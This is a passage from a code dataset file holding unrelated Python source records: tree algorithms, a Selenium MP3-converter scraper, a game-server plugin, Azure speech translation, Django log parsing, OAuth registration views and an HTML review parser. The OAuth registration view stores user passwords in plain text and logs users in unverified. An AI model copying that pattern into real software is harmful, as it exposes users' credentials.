result)\n result.append(root.data)\n #print(result)\n elif(root.left):\n printBoundaryRight(root.left, result)\n result.append(root.data)\n\n\n# Driver program to test above function\nroot = Node(20)\nroot.left = Node(8)\nroot.left.left = Node(4)\nroot.left.right = Node(12)\nroot.left.right.left = Node(10)\nroot.left.right.right = Node(14)\nroot.right = Node(22)\nroot.right.left = Node(21)\nroot.right.right = Node(25)\nprint(printBoundary(root))\n\n\n# def boundary_BT(root):\n# if not root:\n# return\n\n# result = []\n# if root.left or root.right:\n# result.append(root.val)\n\n# leftBoundary(root.left, result)\n# leaves(root, result)\n# rightBoundary(root.right, result)\n\n\n# def leftBoundary(root, result):\n# # Is a leaf node so return\n# if not root or (not root.left and not root.right):\n# return\n# result.append(root.val)\n# if not root.left:\n# leftBoundary(root.right, result)\n# else:\n# leftBoundary(root.left, result)\n\n\n# def leaves(root, result):\n# if not root:\n# return\n# if not root.left and not root.right:\n# result.append(root.val)\n# leaves(root.left, result)\n# leaves(root.right, result)\n\n\n# def rightBoundary(root, result):\n# pass\n","sub_path":"IK/Trees/BoundaryBinaryTree.py","file_name":"BoundaryBinaryTree.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"620346665","text":"import logging\r\nimport time\r\n\r\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.remote.remote_connection import LOGGER\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\n\r\nLOGGER.setLevel(logging.WARNING)\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(filename=\"failed_songs.log\", level=logging.DEBUG)\r\n\r\n# MP3_CONVERTER\r\nENTER_SONG_NAME = \"\"\"document.getElementById(\"youtube-url\").value=\"{}\";\"\"\"\r\nSUBMIT_SONG = \"\"\"document.getElementById(\"submit\").click();\"\"\"\r\nPRESS_DOWNLOAD = \"\"\"for(child in document.getElementById(\"dl_link\").childNodes)if (document.getElementById(\"dl_link\").childNodes.hasOwnProperty(child))if(document.getElementById(\"dl_link\").childNodes[child].style.display==\"\"){document.getElementById(\"dl_link\").childNodes[child].click();break;}\"\"\"\r\n\r\n# CONVERTER2MP3\r\nINSERT_SONG_NAME = \"\"\"document.getElementById(\"urlinput\").value=\"{}\";\"\"\"\r\nCONVERT_SONG = \"\"\"document.getElementsByTagName(\"button\")[1].click();\"\"\"\r\nSKIP_TAGS = \"\"\"document.getElementsByTagName(\"a\")[12].click();\"\"\"\r\nDOWNLOAD_SONG = \"\"\"document.getElementsByTagName(\"a\")[9].click();\"\"\"\r\nCONVERT_NEXT = \"\"\"document.getElementsByTagName(\"span\")[0].click();\"\"\"\r\n\r\n\r\ndef download_mp3_converter(driver, song):\r\n driver.execute_script(ENTER_SONG_NAME.format(song))\r\n driver.execute_script(SUBMIT_SONG)\r\n WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.ID, \"dl_link\")))\r\n driver.execute_script(PRESS_DOWNLOAD)\r\n\r\n\r\ndef download_converter2mp3(driver, song):\r\n def execute(web_driver, command):\r\n web_driver.execute_script(command)\r\n time.sleep(3)\r\n\r\n driver.execute_script(INSERT_SONG_NAME.format(song))\r\n driver.execute_script(CONVERT_SONG)\r\n WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.ID, \"advancedtags_btn\")))\r\n execute(driver, SKIP_TAGS)\r\n execute(driver, DOWNLOAD_SONG)\r\n execute(driver, CONVERT_NEXT)\r\n\r\n\r\nDOWNLOAD_FUNCTIONS = {\"1\": download_converter2mp3, \"2\": download_mp3_converter}\r\n\r\n\r\ndef downloader(driver, mode, songs_list):\r\n download_song = DOWNLOAD_FUNCTIONS[mode]\r\n with open(songs_list, \"r\", encoding=\"utf-8-sig\") as songs:\r\n for song in songs:\r\n try:\r\n download_song(driver, song.strip(\"\\n\"))\r\n except (TimeoutException, NoSuchElementException):\r\n logger.warning(\" Failed to download: \" + song.strip(\"\\n\"))\r\n","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"209082727","text":"import sys\nfrom collections import deque\nq = deque()\nres = []\nfor tmp in sys.stdin.read().splitlines():\n tmp = tmp.split()\n if tmp[0][-1]=='h':\n q.append(tmp[1])\n elif tmp[0][0]=='f':\n res.append(q[0] if q else '-1')\n elif tmp[0][-1]=='p':\n res.append(q.popleft() if q else '-1')\n elif tmp[0][0]=='s':\n res.append(str(len(q)))\n elif tmp[0][0]=='e':\n res.append('0' if q else '1')\n elif tmp[0][0]=='b':\n res.append(q[-1] if q else '-1')\nprint('\\n'.join(res)) ","sub_path":"algo_py/boj/bj18258.py","file_name":"bj18258.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"256912727","text":"# blockBox is copyright 2009-2011 the Archives Team, the blockBox Team, and the iCraft team.\r\n# blockBox is licensed under the Creative Commons by-nc-sa 3.0 UnPorted License.\r\n# To view more details, please see the \"LICENSING\" file in the \"docs\" folder of the blockBox Package.\r\n\r\nfrom blockbox.constants import *\r\nfrom blockbox.decorators import *\r\nfrom blockbox.plugins import ProtocolPlugin\r\n\r\nclass AdminBlocksPlugin(ProtocolPlugin):\r\n\t\"Commands for toggling admincrete options on-off.\"\r\n\r\n\tcommands = {\r\n\t\t\"solid\": \"commandSolid\",\r\n\t}\r\n\r\n\thooks = {\r\n\t\t\"blockchange\": \"blockChanged\",\r\n\t\t\"rankchange\": \"sendAdminBlockUpdate\",\r\n\t\t\"canbreakadmin\": \"canBreakAdminBlocks\",\r\n\t}\r\n\r\n\tdef gotClient(self):\r\n\t\tself.building_solid = False\r\n\r\n\tdef sendAdminBlockUpdate(self):\r\n\t\t\"Sends a packet that updates the client's admin-building ability\"\r\n\t\tself.client.sendPacked(TYPE_INITIAL, 6, \"Admincrete Update\", \"Reloading the server...\", self.canBreakAdminBlocks() and 100 or 0)\r\n\r\n\tdef blockChanged(self, x, y, z, block, selected_block, fromloc):\r\n\t\t\"Hook trigger for block changes.\"\r\n\t\t# Admincrete hack check\r\n\t\tif not self.canBreakAdminBlocks():\r\n\t\t\tdef check_block(block):\r\n\t\t\t\tif ord(block) == BLOCK_GROUND_ROCK:\r\n\t\t\t\t\tself.client.sendError(\"Don't build admincrete!\")\r\n\t\t\t\t\tself.client.world[x, y, z] = chr(BLOCK_AIR)\r\n\t\t\tself.client.world[x,y,z].addCallback(check_block)\r\n\t\t# See if they are in solid-building mode\r\n\t\tif self.building_solid and block == BLOCK_ROCK:\r\n\t\t\treturn BLOCK_GROUND_ROCK\r\n\r\n\tdef canBreakAdminBlocks(self):\r\n\t\t\"Shortcut for checking permissions.\"\r\n\t\tif hasattr(self.client, \"world\"):\r\n\t\t\treturn (not self.client.world.admin_blocks) or self.client.isOp()\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\t@build_list\r\n\t@op_only\r\n\tdef commandSolid(self, parts, fromloc, overriderank):\r\n\t\t\"/solid - Op\\nToggles admincrete creation.\"\r\n\t\tif self.building_solid:\r\n\t\t\tself.client.sendServerMessage(\"You are now placing normal rock.\")\r\n\t\telse:\r\n\t\t\tself.client.sendServerMessage(\"You are now placing admin rock.\")\r\n\t\tself.building_solid = not self.building_solid","sub_path":"blockbox/plugins/solids.py","file_name":"solids.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"432046335","text":"\"\"\"\r\nlist: 可变数据类型, 类似于C++中的vector\r\n\"\"\"\r\n\r\n'''\r\n增\r\n'''\r\n# + append extend insert\r\narr = [9, 5, 2, 7]\r\nprint(arr + arr)\r\narr.append(12) # 追加1个对象\r\nprint(arr)\r\nright = [13, 99]\r\narr.extend(right) # 添加多个对象\r\nprint(arr)\r\narr = [9, 5, 2, 7]\r\narr.insert(1, 100)\r\nprint(arr)\r\n\r\n'''\r\n删\r\n'''\r\n# del[index] pop(index=-1) remove clear\r\narr = [9, 5, 2, 7]\r\ndel arr[1]\r\nprint(arr)\r\narr = [9, 5, 2, 7]\r\narr.pop()\r\nprint(arr)\r\narr = [9, 5, 2, 7]\r\narr.remove(2)\r\nprint(arr)\r\narr.clear()\r\nprint(arr)\r\n\r\n'''\r\n改\r\n'''\r\n# [index]\r\narr = [9, 5, 2, 7]\r\narr[1] = 13\r\nprint(arr)\r\n# sort(key=None, reverse=False)\r\n# key, reverse 想当于c++中的仿函数\r\narr = [9, 5, 2, 7]\r\narr.sort()\r\nprint(arr)\r\narr = [9, 5, 2, 7]\r\narr.sort(reverse=True)\r\nprint(arr)\r\n\r\n\r\ndef mysort(val):\r\n return val[1]\r\n\r\n\r\narr = [(1, 2), (2, 4), (2, 3), (5, 0)]\r\narr.sort(key=mysort)\r\nprint(arr)\r\n# reverse\r\narr = [9, 5, 2, 7]\r\narr.reverse()\r\nprint(arr)\r\n\r\n'''\r\n查\r\n'''\r\n# [index] index count\r\narr = [9, 5, 2, 7]\r\nindex = arr.index(5)\r\nprint(index)\r\ncount = arr.count(9)\r\nprint(count)\r\n# [start:end:step] 切片\r\narr = [9, 5, 2, 7]\r\nprint(arr[-1::-1]) # arr.reverse()\r\nprint(arr[1:len(arr)]) # 左闭右开\r\nprint(arr[::2])\r\n\r\n# copy 拷贝一份, id不同\r\narr = [9, 5, 2, 7]\r\nnewarr = arr.copy()\r\nprint(id(arr))\r\nprint(id(newarr))\r\n","sub_path":"Python/TypeAndOper/List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"565457984","text":"import azure.cognitiveservices.speech as speechsdk\nfrom azure.cognitiveservices.speech.translation import TranslationSynthesisResult\n\n########### CONFIGURTATION #####\nSTORE_TO_FILE = 1\nfolderPath = '/Users/mayankgupta/Projects/TTB/AzureCognitiveServices/Results/'\nfileName = 'KhanAcademyLinearAlgebratranslate_hindi.txt' #'KhanAcademyLinearAlgebra' #'3blue1brown-channel-trailer'\n\n# Creates an instance of a speech config with specified subscription key and service region.\n# Replace with your own subscription key and service region (e.g., \"westus\").\nwith open('/Users/mayankgupta/Projects/TTB/AzureCognitiveServices/key.txt', 'r') as f:\n speech_key = f.readline().rstrip()\nservice_region = \"eastus\"\n#########\n\ndef translate_speech_to_speech():\n\n # Creates an instance of a speech translation config with specified subscription key and service region.\n # Replace with your own subscription key and region identifier from here: https://aka.ms/speech/sdkregion\n translation_config = speechsdk.translation.SpeechTranslationConfig(subscription=speech_key, region=service_region)\n\n # Sets source and target languages.\n # Replace with the languages of your choice, from list found here: https://aka.ms/speech/sttt-languages\n fromLanguage = 'en-US'\n toLanguage = 'hi-IN'\n translation_config.speech_recognition_language = fromLanguage\n translation_config.add_target_language(toLanguage)\n\n # Sets the synthesis output voice name.\n # Replace with the languages of your choice, from list found here: https://aka.ms/speech/tts-languages\n translation_config.voice_name = \"de-DE-Hedda\"\n # Creates an audio configuration that points to an audio file.\n # Replace with your own audio filename.\n audio_filename = \"Results/KhanAcademyLinearAlgebra.wav\"\n audio_input = speechsdk.audio.AudioOutputConfig(filename=audio_filename)\n\n # Creates a translation recognizer using and audio file as input.\n recognizer = speechsdk.translation.TranslationRecognizer(translation_config=translation_config, audio_config=audio_input)\n\n # Prepare to handle the synthesized audio data.\n def synthesis_callback(evt):\n size = len(evt.result.audio)\n\n if evt.result.reason == speechsdk.ResultReason.SynthesizingAudio:\n print('writing to wav file!!!')\n try:\n with open(f\"out_{size}.wav\", 'wb') as wavfile:\n wavfile.write(evt.result.audio)\n except Exception as e:\n print(f'could not write to file: {e}')\n\n print('AUDIO SYNTHESIZED: {} byte(s) {}'.format(size, '(COMPLETED)' if size == 0 else ''))\n\n recognizer.synthesizing.connect(synthesis_callback)\n\n # Starts translation, and returns after a single utterance is recognized. The end of a\n # single utterance is determined by listening for silence at the end or until a maximum of 15\n # seconds of audio is processed. It returns the recognized text as well as the translation.\n # Note: Since recognize_once() returns only a single utterance, it is suitable only for single\n # shot recognition like command or query.\n # For long-running multi-utterance recognition, use start_continuous_recognition() instead.\n print(\"Say something...\")\n result = recognizer.recognize_once()\n\n # Check the result\n if result.reason == speechsdk.ResultReason.TranslatedSpeech:\n print(\"RECOGNIZED '{}': {}\".format(fromLanguage, result.text))\n print(\"TRANSLATED into {}: {}\".format(toLanguage, result.translations['hi']))\n elif result.reason == speechsdk.ResultReason.RecognizedSpeech:\n print(\"RECOGNIZED: {} (text could not be translated)\".format(result.text))\n elif result.reason == speechsdk.ResultReason.NoMatch:\n print(\"NOMATCH: Speech could not be recognized: {}\".format(result.no_match_details))\n elif result.reason == speechsdk.ResultReason.Canceled:\n print(\"CANCELED: Reason={}\".format(result.cancellation_details.reason))\n if result.cancellation_details.reason == speechsdk.CancellationReason.Error:\n print(\"CANCELED: ErrorDetails={}\".format(result.cancellation_details.error_details))\n\ntranslate_speech_to_speech()","sub_path":"speech-translation/Python/SpeechToSpeech.py","file_name":"SpeechToSpeech.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"111619564","text":"from django.shortcuts import render, redirect\nfrom dashboard.models import LogsHolder, error_logs\nfrom .models import daily_bandwidth\nimport pandas as pd\nimport re\nimport glob\nfrom xopen import xopen\nimport shutil\nimport os\nimport time\nfrom datetime import datetime\nfrom time import strptime\n\n\n# Create your views here.\ndef index(request):\n flag = 0\n if request.method == 'POST':\n request.session['source'] = request.POST.get('source')\n source = request.POST.get('source')\n print(request.session.get('source'))\n if os.path.exists(str(request.session.get('source'))):\n flag = 0\n start_time = time.time()\n # Insert data from log into database\n source_dir = request.session['source']\n if os.path.exists(source_dir):\n files = glob.iglob(os.path.join(source_dir, \"access.log.*.gz\"))\n\n for i in files:\n with xopen(i, 'rb') as f_in:\n with open(i + '.log', 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n else:\n print(\"IOError: [Errno 2] No such file or directory: '\" + source_dir + \"'\")\n\n hourly = {'00': 0, '01': 0, '02': 0, '03': 0, '04': 0, '05': 0, '06': 0, '07': 0, '08': 0, '09': 0, '10': 0,\n '11': 0, '12': 0, '13': 0, '14': 0, '15': 0, '16': 0, '17': 0, '18': 0, '19': 0, '20': 0, '21': 0,\n '22': 0, '23': 0}\n tangent = 0\n conf = '$remote_addr - $remote_user [$time_local] \"$request\" $status $body_bytes_sent \"$http_referer\" \"$http_user_agent\"'\n regex = ''.join(\n '(?P<' + g + '>.*?)' if g else re.escape(c)\n for g, c in re.findall(r'\\$(\\w+)|(.)', conf))\n\n files = glob.iglob(os.path.join(source_dir, \"access.log.*.gz.log\"))\n\n for filepath in files:\n\n raw_data = open(filepath, \"r\", encoding=\"utf8\")\n authorizedusers = []\n\n for idx, i in enumerate(raw_data):\n m = re.match(regex, i)\n\n # Find the authorized users\n authorized = re.findall('(.*\\d) - - .*POST.*200 \\d{1,}', i)\n if len(authorized):\n authorizedip = str(authorized[0])\n if authorizedip not in authorizedusers:\n authorizedusers.append(authorizedip)\n\n # Temp Area\n\n # print(authorizedusers)\n # temp = LogsHolder.objects.filter(authorizedUser = True).distinct()\n # for i in temp:\n # if i.remoteAddr in authorizedusers:\n # print(\"True\")\n\n # Temp Area\n\n payload = m.groupdict()\n # 'daily bandwidth\n\n print(hourly)\n data = LogsHolder()\n data.remoteAddr = payload['remote_addr']\n data.remoteUser = payload['remote_user']\n\n # Convert time in logformat to time in python datetime format and store it in db\n timeLocalstr = str(payload['time_local'])\n timeLocal = datetime.strptime(timeLocalstr, '%d/%b/%Y:%H:%M:%S %z')\n timeLocal = timeLocal.replace(tzinfo=None)\n data.timeLocal = timeLocal\n\n data.request = payload['request']\n data.status = payload['status']\n data.bodyBytesSent = payload['body_bytes_sent']\n data.httpReferer = payload['http_referer']\n data.httpUserAgent = payload['http_user_agent']\n\n # Check and add the authorized column value\n if str(payload['remote_addr']) in authorizedusers:\n data.authorizedUser = True\n else:\n data.authorizedUser = False\n\n if (LogsHolder.objects.filter(remoteAddr=payload['remote_addr'], remoteUser=payload['remote_user'],\n timeLocal=timeLocal, request=payload['request'],\n status=payload['status'], bodyBytesSent=payload['body_bytes_sent'],\n httpReferer=payload['http_referer'],\n httpUserAgent=payload['http_user_agent']).count() == 0):\n data.save()\n tangent = 1\n hourly[payload['time_local'].split(\":\")[1]] += int(payload['body_bytes_sent'])\n\n # ' error log storing in db'\n conf = \"$date $time [$level] $pid#$tid: '$message'\"\n regex = ''.join(\n '(?P<' + g + '>.*?)' if g else re.escape(c)\n for g, c in re.findall(r'\\$(\\w+)|(.)', conf))\n\n files = glob.iglob(os.path.join(source_dir, \"error.log\"))\n\n for filepath in files:\n\n raw_data = open(filepath, \"r\", encoding=\"utf8\")\n for idx, i in enumerate(raw_data):\n m = re.match(regex, i)\n errorlog = m.groupdict()\n data = error_logs()\n data.date = errorlog['date'].replace('/', '-')\n data.time = errorlog['time']\n data.level = errorlog['level']\n data.pid = errorlog['pid']\n data.tid = errorlog['tid']\n try:\n data.message = errorlog['message'].split(\",\")[0]\n data.client = errorlog['message'].split(\",\")[1].split(\":\")[1].strip()\n data.request = errorlog['message'].split(\",\")[3].split(\":\")[1].strip()\n except:\n data.message = errorlog['message']\n data.client = \"-\"\n data.request = \"-\"\n data.save()\n\n if tangent:\n if daily_bandwidth.objects.all().count() == 0:\n for k, v in hourly.items():\n data = daily_bandwidth()\n data.day = k\n data.bandwidth = v\n data.save()\n else:\n data = daily_bandwidth.objects.all()\n\n for _ in data:\n print(hourly[_.day])\n hourly[_.day] = int(hourly[_.day]) + int(_.bandwidth)\n\n for k, v in hourly.items():\n data = daily_bandwidth()\n data.day = k\n data.bandwidth = v\n data.save()\n with open(\"E:\\\\Server\\\\Logs\\\\nginx\\\\catalina.log\") as cat:\n for line in cat:\n line = line.strip()\n try:\n m = re.match(r'^(\\d+\\-\\S+\\-\\d{4})\\s(\\d+\\:\\d+\\:\\d+\\.\\d{3})\\s(\\S+)\\s(\\[\\S+\\])\\s(\\S+)\\s(.*)', line,\n re.I)\n data = error_logs()\n\n z = m[1].replace(m[1].split(\"-\")[1], str(strptime(m[1].split(\"-\")[1], '%b').tm_mon))\n format_str = '%d-%m-%Y'\n datetime_obj = datetime.strptime(z, format_str)\n data.date = datetime_obj\n data.time = m[2]\n data.level = m[3]\n\n data.tid = m[4]\n data.client = m[5]\n data.message = m[6]\n data.pid = '-'\n data.request = \"-\"\n data.save()\n except:\n print(\"NONE CATALIAN\")\n print(\"----%s seconds ----\" % (time.time() - start_time))\n return redirect('dashboard')\n else:\n print(\"lolbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbiiiiiiiiiiiiiiiiiiii\")\n flag = 1\n # return redirect('')\n return render(request, \"index/index.html\", {'flag': flag})\n","sub_path":"index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"283938189","text":"\"\"\"459. Repeated Substring Pattern\nhttps://leetcode.com/problems/repeated-substring-pattern/\n\nGiven a non-empty string check if it can be constructed by taking a substring\nof it and appending multiple copies of the substring together.\nYou may assume the given string consists of lowercase English letters only\nand its length will not exceed 10000.\n\nExample 1:\n\nInput: \"abab\"\nOutput: True\nExplanation: It's the substring \"ab\" twice.\n\nExample 2:\n\nInput: \"aba\"\nOutput: False\n\nExample 3:\n\nInput: \"abcabcabcabc\"\nOutput: True\nExplanation: It's the substring \"abc\" four times. (And the substring \"abcabc\" twice.)\n\"\"\"\n\n\nclass Solution:\n def repeated_substring_pattern_1(self, s: str) -> bool:\n return s in (s + s)[1:-1]\n\n def repeated_substring_pattern(self, s: str) -> bool:\n def validate(prefix: str, start: int) -> bool:\n if start == n:\n return True\n if s[start:].startswith(prefix):\n return validate(prefix, start + len(prefix))\n else:\n return False\n\n n = len(s)\n for x in range(n // 2, 0, -1):\n if n % x == 0:\n if validate(s[:x], 0):\n return True\n return False\n","sub_path":"python-algorithm/leetcode/problem_459.py","file_name":"problem_459.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78163831","text":"from math import *\nimport functools\nimport sys\n\nclass OutputWriter:\n '''\n A class which wraps stdout, stderr and file writing so that the where\n particular data is to be written does not have to change how the user writes\n it\n '''\n def __init__(self, output_loc):\n self.output_loc = output_loc\n if output_loc == \"stdout\":\n self.output = sys.stdout\n elif output_loc == \"stderr\":\n self.output = sys.stderr\n else:\n self.output = open(output_loc, \"a\")\n\n def write(self, text):\n self.output.write(text + \"\\n\")\n\n def close(self):\n if not (self.output_loc in [\"stdout\", \"stderr\"]):\n self.output.close()\n\ndef non_trivial_factors(n):\n '''\n Returns a set of non-trivial (i.e. not 1 and itself) factors of natural\n number\n '''\n # Create a list of pairs of factors n\n fact_list = [[i, n // i] for i in range(2, ceil((sqrt(n)))+5) if n % i == 0]\n\n # If n is prime, fact_list will be empty, which will break reduce\n if fact_list == list():\n return set(list())\n\n # Reduce the pairs of factors, remove duplicates, and sort by size\n return sorted(set(functools.reduce(lambda a, b: a + b, fact_list)))\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"53654435","text":"mystring1=input()\nmystring2=mystring1.strip('[')\nmystring3=mystring2.strip(']')\nlist1=mystring3.split(\",\")\nlist1=[int(x) for x in list1]\nn1=len(list1)\nmstring1=input()\nmstring2=mstring1.strip('[')\nmstring3=mstring2.strip(']')\nlist2=mstring3.split(\",\")\nlist2=[int(x) for x in list2]\nn2=len(list2)\nlist3=list1+list2\nlist3.sort()\nprint(list3)","sub_path":"Code/CodeRecords/2526/60651/303473.py","file_name":"303473.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"395220801","text":"grossIncome = float(input(\"Please enter your gross annual income in dollars:\"))\ntaxDeduct = float(input(\"Please enter your tax deductions in dollars:\"))\ntaxableIncome = 0.0\ntaxRate = 0.0\ntaxPayable = 0.0\nnetIncome = 0.0\n\nif (grossIncome >= 0.0 and grossIncome < 18200.00 ):\n taxRate = 0.0\nelse:\n if (grossIncome >= 18200.00 and grossIncome < 37000.00 ):\n taxRate = 0.19\n else:\n if (grossIncome >= 37000.00 and grossIncome < 90000.00 ):\n taxRate = 0.325\n else:\n if (grossIncome >= 90000.00 and grossIncome < 180000.00 ):\n taxRate = 0.37\n else:\n if (grossIncome >= 180000.00):\n taxRate = 0.45\n\ntaxableIncome = grossIncome-taxDeduct\ntaxPayable = taxableIncome*taxRate\nnetIncome = grossIncome-taxPayable\n\nprint(\"Your gross income is $%.2f\" %grossIncome)\nprint(\"Your tax deductions are $%.2f\" %taxDeduct)\nprint(\"Your tax rate is\", taxRate*100, \"percent\")\nprint(\"The amount of tax you owe is $%.2f\" %taxPayable)\nprint(\"Your net income is $%.2f\" %netIncome)\n","sub_path":"Week4/A/Week4_Branch11.py","file_name":"Week4_Branch11.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"483531221","text":"import requests\nfrom django.views import View\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.http import HttpResponseRedirect\nfrom django.utils.http import urlencode\nimport json\n# from authlib.integrations.httpx_client import AsyncOAuth2Client\nfrom authlib.integrations.requests_client import OAuth2Session\nfrom asg_web_app import settings\nfrom asg_web_app.settings import oauth\nfrom user.models import User, AdditionalInfo, Interest\nfrom user.form import RegisterForm\n\n\n# TODO: set up the https to test\ndef google(request):\n # The below client id and secret should be changed after you get your own id and secret\n redirect_uri = 'https://localhost:8000/oauth/google_callback'\n google = oauth.create_client('google')\n return google.authorize_redirect(request, redirect_uri)\n\n\ndef google_callback(request):\n print(\"in the callback\")\n # google = oauth.create_client('google')\n token = oauth.google.authorize_access_token(request)\n user = oauth.google.userinfo(request)\n # do something with the token and profile\n message = \"nothing received\"\n print(request.get_full_path())\n print(\"hi\")\n print(token)\n print(user)\n return render(request, \"oauth/index.html\", {'message': message})\n\n\ndef facebook(request):\n # The below client id and secret should be changed after you get your own id and secret\n redirect_uri = 'https://localhost:8000/oauth/facebook_callback'\n facebook = oauth.create_client('facebook')\n return facebook.authorize_redirect(request, redirect_uri)\n\n\ndef facebook_callback(request):\n print(\"in the facebook callback\")\n # facebook = oauth.create_client('facebook')\n token = oauth.facebook.authorize_access_token(request)\n user = oauth.facebook.userinfo(request)\n # do something with the token and profile\n message = \"nothing received\"\n print(request.get_full_path())\n print(\"hi\")\n print(token)\n print(user)\n return render(request, \"oauth/index.html\", {'message': message})\n\n\ndef github(request):\n # The below client id and secret should be changed after you get your own id and secret\n redirect_uri = 'https://localhost:8000/oauth/github_callback'\n github = oauth.create_client('github')\n return github.authorize_redirect(request, redirect_uri)\n\n\ndef github_callback(request):\n token = oauth.github.authorize_access_token(request)\n resp = oauth.github.get(url='https://api.github.com/user', token=token)\n profile = resp.json()\n # do something with the token and profile\n return github_redirect(request, profile)\n\n\ndef github_redirect(request, profile):\n message = 'please register your account here!'\n new_user_name = profile['login']\n same_user_name = User.objects.filter(username=new_user_name)\n if same_user_name:\n message += 'The user name was already existed, please choose a new one'\n new_user_name = ''\n email = profile['email']\n if email is None:\n email = ''\n register_form = RegisterForm(initial={\n 'username': new_user_name,\n 'email': email,\n })\n return render(request, \"oauth/oauth_register.html\", {'message': message, 'register_form': register_form})\n\n\ndef final_register(request):\n if request.method == 'POST':\n register_form = RegisterForm(request.POST)\n check_term = request.POST.get('term_check') # another method to get check box, or can use form.cleaned_data\n if check_term == 'on':\n stored_form = register_form\n if register_form.is_valid():\n # dont wanna fill form again\n # username = register_form.cleaned_data['username']\n register_form.clean()\n username = request.POST.get('username')\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n email = request.POST.get('email')\n # check passwords are the same\n if password1 != password2:\n message = 'Not the same password'\n return render(request, 'user/register.html', {'message': message, 'register_form': stored_form})\n else:\n same_name_user = User.objects.filter(username=username)\n # check user name\n if same_name_user:\n message = 'The user name was already existed'\n return render(request, 'user/register.html',\n {'message': message, 'register_form': stored_form})\n\n same_email_user = User.objects.filter(email=email)\n if same_email_user:\n message = 'The email was registered, please use another one'\n return render(request, 'user/register.html',\n {'message': message, 'register_form': stored_form})\n interest = Interest()\n user = User()\n additional_info = AdditionalInfo()\n additional_info.save()\n interest.save()\n user.additionalInfo = additional_info\n user.interest = interest\n user.email = email\n user.password = password1\n user.username = username\n user.is_active = True\n user.save()\n # TODO: label as todo to ensure later check\n # the user was logged without verification of their email, may need change here\n request.session['is_login'] = True\n request.session['user_name'] = user.username\n return redirect('/user/index/')\n\n register_form = RegisterForm()\n message = 'There are something with the submitted form'\n\n return render(request, \"oauth/oauth_register.html\", locals())\n","sub_path":"ArtsourceGlobal/oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"581038710","text":"'''\nCreated on Aug 10, 2021\n\n@author: Jacob Summers\n'''\n\n'''\nRepresents the object that parses information about a user review from the given html code\n'''\nclass album_review(object):\n '''\n Constructor for the Album_Review object\n Parameters:\n html represents the html code of a given user review\n '''\n def __init__(self, html):\n \n #represents the html code that contains the user review information\n self.html = html\n #represents the date that the review was published\n self.year = \"\"\n #represents the score that the user gave\n self.score = 0\n #represents the name of the user\n self.name = \"\"\n #represents the summary that the user gave\n self.summary = \"\"\n #represents how many people found the review helpful\n self.helpful = \"\"\n \n #begins parsing the information\n self._begin_parse()\n '''\n Prints the object as a formatted string\n '''\n def to_string(self):\n return \"Score of \" + self.get_score() + \" -- User: \" + self.get_name() + \" -- Date: \" + self.get_year() + \" -- \" + self.get_helpful()\n \n '''\n Gets the date of the user's review\n ''' \n def get_year(self):\n return self.year\n \n '''\n Gets the score that the user gave\n ''' \n def get_score(self):\n return self.score\n \n '''\n Gets the name of the user who made the review\n ''' \n def get_name(self):\n return self.name\n \n '''\n Gets the detailed summary of the user's review\n ''' \n def get_summary(self):\n return self.summary\n \n '''\n Gets the number of people who found the review helpful\n ''' \n def get_helpful(self):\n return self.helpful\n \n '''\n Parses the review information from the html code\n ''' \n def _begin_parse(self):\n \n '''\n Parses the date that the review was made\n '''\n def parse_year():\n #get the index where the date is located\n start_index = self.html.find(\"
\") + len(\"
\")\n html = self.html[start_index:]\n \n end_index = html.find(\"<\")\n \n #isolate it from the rest of the code\n year = html[:end_index]\n \n return year\n '''\n Parses the score that the user gave in the review\n '''\n def parse_score():\n \n #get the index where the score is located in the review\n start_index = self.html.find(\"
\") + len(\">\")\n end_index = html.find(\"
\")\n \n #isolate it from the rest of the html code\n score = html[start_index:end_index] \n \n \n return score\n \n '''\n Parses the name of the user in the review\n '''\n def parse_name():\n \n #get the index where the user's name is located\n start_index = self.html.find(\"\") + len(\">\")\n end_index = html.find(\"<\")\n \n #isolate it from the rest of the code\n name = html[start_index:end_index]\n \n return name\n '''\n Parses the text summary of the user's review\n '''\n def parse_summary():\n #isolate the summary from the rest of the user code\n start_index = self.html.find(\"
\") + len(\"
\")\n html = self.html[start_index:]\n end_index = html.find(\"
